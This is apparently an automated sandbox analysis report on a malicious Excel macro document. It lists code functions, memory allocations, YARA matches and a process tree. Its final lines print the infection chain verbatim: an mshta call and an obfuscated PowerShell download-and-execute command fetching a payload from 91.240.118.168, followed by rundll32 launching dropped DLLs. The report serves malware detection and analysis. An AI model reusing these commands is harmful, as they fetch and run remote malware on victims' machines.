Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00205E60 11_2_00205E60
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0021AE6D 11_2_0021AE6D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00210E53 11_2_00210E53
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0020EE81 11_2_0020EE81
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00204EE3 11_2_00204EE3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00219EEC 11_2_00219EEC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0020AEFB 11_2_0020AEFB
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0021DEDC 11_2_0021DEDC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00220F33 11_2_00220F33
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0020CF47 11_2_0020CF47
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00207FF2 11_2_00207FF2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0020DFF3 11_2_0020DFF3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_002D3C3C 12_2_002D3C3C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_002D9011 12_2_002D9011
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_002E044F 12_2_002E044F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_002E20BA 12_2_002E20BA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_002DF8FD 12_2_002DF8FD
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_002DD6D8 12_2_002DD6D8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_002E473C 12_2_002E473C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_002E4116 12_2_002E4116
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_002F13AD 12_2_002F13AD
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_002DAB87 12_2_002DAB87
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_002E95FA 12_2_002E95FA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_002D7FF2 12_2_002D7FF2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_002D59F2 12_2_002D59F2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_002EBE27 12_2_002EBE27
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_002D3E3F 12_2_002D3E3F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_002EAC3A 12_2_002EAC3A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_002F0E3A 12_2_002F0E3A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_002D7C37 12_2_002D7C37
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_002EF435 12_2_002EF435
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_002EAA30 12_2_002EAA30
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_002EC631 12_2_002EC631
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_002E8606 12_2_002E8606
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_002E0001 12_2_002E0001
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_002F0C14 12_2_002F0C14
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_002D4816 12_2_002D4816
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_002EAE6D 12_2_002EAE6D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_002EA666 12_2_002EA666
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_002D5E60 12_2_002D5E60
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_002E907F 12_2_002E907F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_002E6C49 12_2_002E6C49
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_002D4C5D 12_2_002D4C5D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_002F0056 12_2_002F0056
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_002D1A56 12_2_002D1A56
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_002D2051 12_2_002D2051
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_002D2251 12_2_002D2251
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_002E0E53 12_2_002E0E53
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_002D70B3 12_2_002D70B3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_002E1889 12_2_002E1889
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_002DEE81 12_2_002DEE81
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_002DEA99 12_2_002DEA99
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_002DF09B 12_2_002DF09B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_002E9EEC 12_2_002E9EEC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_002EA2E8 12_2_002EA2E8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_002D4EE3 12_2_002D4EE3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_002D64E2 12_2_002D64E2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_002DAEFB 12_2_002DAEFB
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_002EDCF7 12_2_002EDCF7
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_002DE2CC 12_2_002DE2CC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_002E66CA 12_2_002E66CA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_002DB2C7 12_2_002DB2C7
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_002E5CC4 12_2_002E5CC4
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_002EDEDC 12_2_002EDEDC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_002D6D24 12_2_002D6D24
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_002EBB23 12_2_002EBB23
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_002D8B3D 12_2_002D8B3D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_002D7735 12_2_002D7735
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_002F0F33 12_2_002F0F33
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_002E8519 12_2_002E8519
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_002E0B19 12_2_002E0B19
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_002D9714 12_2_002D9714
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_002D8969 12_2_002D8969
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_002E176B 12_2_002E176B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_002D5361 12_2_002D5361
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_002DBB7E 12_2_002DBB7E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_002DB74D 12_2_002DB74D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_002D5548 12_2_002D5548
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_002E894B 12_2_002E894B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_002DCF47 12_2_002DCF47
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_002D4346 12_2_002D4346
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_002DA55F 12_2_002DA55F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_002ECB5B 12_2_002ECB5B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_002E2550 12_2_002E2550
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_002E7BA6 12_2_002E7BA6
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_002EC3A0 12_2_002EC3A0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_002D51BB 12_2_002D51BB
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_002F09B5 12_2_002F09B5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_002D81B7 12_2_002D81B7
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_002ED389 12_2_002ED389
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_002E4B87 12_2_002E4B87
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_002D9B83 12_2_002D9B83
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_002EE395 12_2_002EE395
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_002DE991 12_2_002DE991
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_002EDBEA 12_2_002EDBEA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_002E8BE3 12_2_002E8BE3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_002E6DF8 12_2_002E6DF8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_002DDFF3 12_2_002DDFF3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_002E9BCF 12_2_002E9BCF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_002D9DCF 12_2_002D9DCF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_002DE5CF 12_2_002DE5CF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_002D2BD9 12_2_002D2BD9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_002E7DD5 12_2_002E7DD5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00B0F8FD 14_2_00B0F8FD
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00B0E991 14_2_00B0E991
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00B0AB87 14_2_00B0AB87
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00B070B3 14_2_00B070B3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00B120BA 14_2_00B120BA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00B0EA99 14_2_00B0EA99
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00B0F09B 14_2_00B0F09B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00B0EE81 14_2_00B0EE81
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00B11889 14_2_00B11889
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00B1DCF7 14_2_00B1DCF7
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00B0AEFB 14_2_00B0AEFB
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00B064E2 14_2_00B064E2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00B04EE3 14_2_00B04EE3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00B1A2E8 14_2_00B1A2E8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00B19EEC 14_2_00B19EEC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00B0D6D8 14_2_00B0D6D8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00B1DEDC 14_2_00B1DEDC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00B15CC4 14_2_00B15CC4
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00B0B2C7 14_2_00B0B2C7
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00B166CA 14_2_00B166CA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00B0E2CC 14_2_00B0E2CC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00B1C631 14_2_00B1C631
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00B1AA30 14_2_00B1AA30
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00B1F435 14_2_00B1F435
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00B07C37 14_2_00B07C37
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00B20E3A 14_2_00B20E3A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00B1AC3A 14_2_00B1AC3A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00B03C3C 14_2_00B03C3C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00B03E3F 14_2_00B03E3F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00B1BE27 14_2_00B1BE27
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00B09011 14_2_00B09011
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00B04816 14_2_00B04816
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00B20C14 14_2_00B20C14
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00B10001 14_2_00B10001
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00B18606 14_2_00B18606
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00B1907F 14_2_00B1907F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00B05E60 14_2_00B05E60
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00B1A666 14_2_00B1A666
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00B1AE6D 14_2_00B1AE6D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00B02051 14_2_00B02051
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00B02251 14_2_00B02251
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00B10E53 14_2_00B10E53
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00B20056 14_2_00B20056
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00B01A56 14_2_00B01A56
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00B04C5D 14_2_00B04C5D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00B16C49 14_2_00B16C49
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00B1044F 14_2_00B1044F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00B209B5 14_2_00B209B5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00B081B7 14_2_00B081B7
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00B051BB 14_2_00B051BB
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00B1C3A0 14_2_00B1C3A0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00B17BA6 14_2_00B17BA6
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00B213AD 14_2_00B213AD
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00B1E395 14_2_00B1E395
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00B09B83 14_2_00B09B83
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00B14B87 14_2_00B14B87
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00B1D389 14_2_00B1D389
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00B07FF2 14_2_00B07FF2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00B059F2 14_2_00B059F2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00B0DFF3 14_2_00B0DFF3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00B16DF8 14_2_00B16DF8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00B195FA 14_2_00B195FA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00B18BE3 14_2_00B18BE3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00B1DBEA 14_2_00B1DBEA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00B17DD5 14_2_00B17DD5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00B02BD9 14_2_00B02BD9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00B19BCF 14_2_00B19BCF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00B09DCF 14_2_00B09DCF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00B0E5CF 14_2_00B0E5CF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00B20F33 14_2_00B20F33
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00B07735 14_2_00B07735
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00B1473C 14_2_00B1473C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00B08B3D 14_2_00B08B3D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00B1BB23 14_2_00B1BB23
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00B06D24 14_2_00B06D24
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00B09714 14_2_00B09714
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00B14116 14_2_00B14116
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00B18519 14_2_00B18519
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00B10B19 14_2_00B10B19
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00B0BB7E 14_2_00B0BB7E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00B05361 14_2_00B05361
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00B08969 14_2_00B08969
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00B1176B 14_2_00B1176B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00B12550 14_2_00B12550
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00B1CB5B 14_2_00B1CB5B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00B0A55F 14_2_00B0A55F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00B04346 14_2_00B04346
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00B0CF47 14_2_00B0CF47
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00B05548 14_2_00B05548
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00B1894B 14_2_00B1894B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00B0B74D 14_2_00B0B74D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_003BA03A 15_2_003BA03A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_003A323F 15_2_003A323F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_003A303C 15_2_003A303C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_003C023A 15_2_003C023A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_003BBA31 15_2_003BBA31
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_003B9E30 15_2_003B9E30
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_003A7037 15_2_003A7037
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_003BE835 15_2_003BE835
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_003BB227 15_2_003BB227
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_003C0014 15_2_003C0014
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_003A8411 15_2_003A8411
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_003A3C16 15_2_003A3C16
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_003AF401 15_2_003AF401
Document misses a certain OLE stream usually present in this Microsoft Office document type
Source: 4B14.tmp.0.dr OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Abnormal high CPU Usage
Source: C:\Windows\SysWOW64\rundll32.exe Process Stats: CPU usage > 98%
Found a hidden Excel 4.0 Macro sheet
Source: 364453688149503140239183.xls Macro extractor: Sheet name: GODVIN
Source: 364453688149503140239183.xls Macro extractor: Sheet name: GODVIN
Searches for the Microsoft Outlook file path
Source: C:\Windows\System32\mshta.exe Key opened: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE Jump to behavior
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76F90000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76E90000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76F90000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76E90000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76F90000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76E90000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76F90000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76E90000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76F90000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76E90000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76F90000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76E90000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76F90000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76E90000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76F90000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76E90000 page execute and read and write Jump to behavior
Contains functionality to delete services
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_002DE249 DeleteService, 12_2_002DE249
Yara signature match
Source: 364453688149503140239183.xls, type: SAMPLE Matched rule: SUSP_Excel4Macro_AutoOpen date = 2020-03-26, author = John Lambert @JohnLaTwC, description = Detects Excel4 macro use with auto open / close, score = 2fb198f6ad33d0f26fb94a1aa159fef7296e0421da68887b8f2548bbd227e58f
Source: C:\Users\user\Desktop\364453688149503140239183.xls, type: DROPPED Matched rule: SUSP_Excel4Macro_AutoOpen date = 2020-03-26, author = John Lambert @JohnLaTwC, description = Detects Excel4 macro use with auto open / close, score = 2fb198f6ad33d0f26fb94a1aa159fef7296e0421da68887b8f2548bbd227e58f
Creates files inside the system directory
Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Windows\SysWOW64\Bwqooqqzlaw\ Jump to behavior
Found potential string decryption / allocating functions
Source: C:\Windows\SysWOW64\rundll32.exe Code function: String function: 10032B38 appears 108 times
Source: C:\Windows\SysWOW64\rundll32.exe Code function: String function: 100201F1 appears 34 times
Source: C:\Windows\SysWOW64\rundll32.exe Code function: String function: 100200FD appears 72 times
Source: C:\Windows\SysWOW64\rundll32.exe Code function: String function: 10030D27 appears 288 times
Source: C:\Windows\SysWOW64\rundll32.exe Code function: String function: 1001F9FC appears 52 times
Source: C:\Windows\SysWOW64\rundll32.exe Code function: String function: 10030D5A appears 82 times
Source: C:\Windows\SysWOW64\rundll32.exe Code function: String function: 100359C1 appears 46 times
Document contains embedded VBA macros
Source: 364453688149503140239183.xls OLE indicator, VBA macros: true
Source: 364453688149503140239183.xls.0.dr OLE indicator, VBA macros: true
Source: classification engine Classification label: mal100.troj.expl.evad.winXLS@25/9@1/47
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File read: C:\Users\desktop.ini Jump to behavior
Source: 364453688149503140239183.xls OLE indicator, Workbook stream: true
Source: 364453688149503140239183.xls.0.dr OLE indicator, Workbook stream: true
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_100125C0 _printf,FindResourceW,LoadResource,SizeofResource,VirtualAllocExNuma,VirtualAlloc,_malloc, 9_2_100125C0
Source: 364453688149503140239183.xls ReversingLabs: Detection: 18%
Source: C:\Windows\System32\mshta.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ........................................................................`I.........v.....................K........l............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w...................../,k....................................}..v............0...............................h............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w...................../,k..... ..............................}..v....h.......0.................l.............h............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....................P.,k....................................}..v............0...............................h............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....................P.,k....x.l.............................}..v....8.......0.................l.............h............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....#.................,k....................................}..v....P.......0...............................h............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....#.................,k....(.l.............................}..v............0.................l.............h............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....'.................,k....E...............................}..v.....k......0...............x.l.............h............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....+.................,k....E...............................}..v............0...............x.l.............h............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....+.......P.S. .C.:.\.U.s.e.r.s.\.A.l.b.u.s.\.D.o.c.u.m.e.n.t.s.>. .......0...............H.#.....:.......h............... Jump to behavior
Source: unknown Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\cmd.exe CMD.EXE /c ms^hta http://91.2^40.118.1^68/vvv/ppp/f^e.ht^m^l
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\mshta.exe mshta http://91.240.118.168/vvv/ppp/fe.html
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.168/vvv/ppp/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c C:\Windows\SysWow64\rundll32.exe C:\ProgramData\QWER.dll BBDD
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWow64\rundll32.exe C:\ProgramData\QWER.dll BBDD
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\ProgramData\QWER.dll",DllRegisterServer
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Bwqooqqzlaw\cojfo.cqz",OOkfVaPZ
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Bwqooqqzlaw\cojfo.cqz",DllRegisterServer
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Jcwhaivtpnbramh\xjgaylzytzzvl.srm",xvIpPUnGjiWnFD
